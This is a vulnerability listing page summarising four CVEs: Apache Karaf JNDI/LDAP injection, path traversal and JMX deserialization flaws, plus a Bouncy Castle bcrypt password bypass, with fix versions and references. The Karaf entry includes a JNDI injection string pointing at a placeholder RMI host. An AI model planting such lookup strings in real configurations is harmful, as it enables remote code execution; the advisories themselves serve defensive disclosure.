CVE-2022-40145 – Apache Karaf: JDBC JAAS LDAP injection
https://notcve.org/view.php?id=CVE-2022-40145
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8 Esta vulnerabilidad se trata de una posible inyección de código cuando un atacante tiene el control del servidor LDAP de destino utilizando la URL JDBC JNDI. La función jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource utiliza InitialContext.lookup(jndiName) sin filtrar. Un usuario puede modificar `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` a `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://xxxx:xxxx/Command ");` en JdbcLoginModuleTest#setup. Esto es vulnerable a un ataque de ejecución remota de código (RCE) cuando una configuración utiliza un URI de origen de datos LDAP JNDI cuando un atacante tiene control del servidor LDAP de destino. Este problema afecta a todas las versiones de Apache Karaf hasta 4.4.1 y 4.3.7. • https://karaf.apache.org/security/cve-2022-40145.txt • CWE-20: Improper Input Validation CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') •
CVE-2022-22932 – Path traversal flaws
https://notcve.org/view.php?id=CVE-2022-22932
Apache Karaf obr:* commands and run goal on the karaf-maven-plugin have partial path traversal which allows to break out of expected folder. The risk is low as obr:* commands are not very used and the entry is set by user. This has been fixed in revision: https://gitbox.apache.org/repos/asf?p=karaf.git;h=36a2bc4 https://gitbox.apache.org/repos/asf?p=karaf.git;h=52b70cf Mitigation: Apache Karaf users should upgrade to 4.2.15 or 4.3.6 or later as soon as possible, or use correct path. • https://karaf.apache.org/security/cve-2022-22932.txt https://access.redhat.com/security/cve/CVE-2022-22932 https://bugzilla.redhat.com/show_bug.cgi?id=2046279 • CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') •
CVE-2021-41766 – Insecure Java Deserialization in Apache Karaf
https://notcve.org/view.php?id=CVE-2021-41766
Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX). JMX is a Java RMI based technology that relies on Java serialized objects for client server communication. Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation used by Apache Karaf is not protected against this kind of attack. The impact of Java deserialization vulnerabilities strongly depends on the classes that are available within the targets class path. Generally speaking, deserialization of untrusted data does always represent a high security risk and should be prevented. • https://karaf.apache.org/security/cve-2021-41766.txt https://access.redhat.com/security/cve/CVE-2021-41766 https://bugzilla.redhat.com/show_bug.cgi?id=2046282 • CWE-502: Deserialization of Untrusted Data •
CVE-2020-28052 – bouncycastle: password bypass in OpenBSDBCrypt.checkPassword utility possible
https://notcve.org/view.php?id=CVE-2020-28052
An issue was discovered in Legion of the Bouncy Castle BC Java 1.65 and 1.66. The OpenBSDBCrypt.checkPassword utility method compared incorrect data when checking the password, allowing incorrect passwords to indicate they were matching with previously hashed ones that were different. Se detectó un problema en Legion of the Bouncy Castle BC Java versiones 1.65 y 1.66. El método de la utilidad OpenBSDBCrypt.checkPassword comparó datos incorrectos al comprobar la contraseña, permitiendo a unas contraseñas incorrectas indicar que coinciden con otras previamente en hash que eran diferentes A flaw was found in bouncycastle. The OpenBSDBCrypt.checkPassword utility method compared incorrect data when checking the password allowing incorrect passwords to indicate they were matching with previously hashed ones that were different. • https://github.com/bcgit/bc-java/wiki/CVE-2020-28052 https://lists.apache.org/thread.html/r167dbc42ef7c59802c2ca1ac14735ef9cf687c25208229993d6206fe%40%3Cissues.karaf.apache.org%3E https://lists.apache.org/thread.html/r175f5a25d100dbe2b1bd3459b3ce882a84c3ff91b120ed4ff2d57b53%40%3Ccommits.pulsar.apache.org%3E https://lists.apache.org/thread.html/r25d53acd06f29244b8a103781b0339c5e7efee9099a4d52f0c230e4a%40%3Ccommits.druid.apache.org%3E https://lists.apache.org/thread.html/r2ddabd06d94b60cfb0141e4abb23201c628ab925e30742f61a04d013%40%3Cissues.karaf.apache.org%3E https://list • CWE-287: Improper Authentication •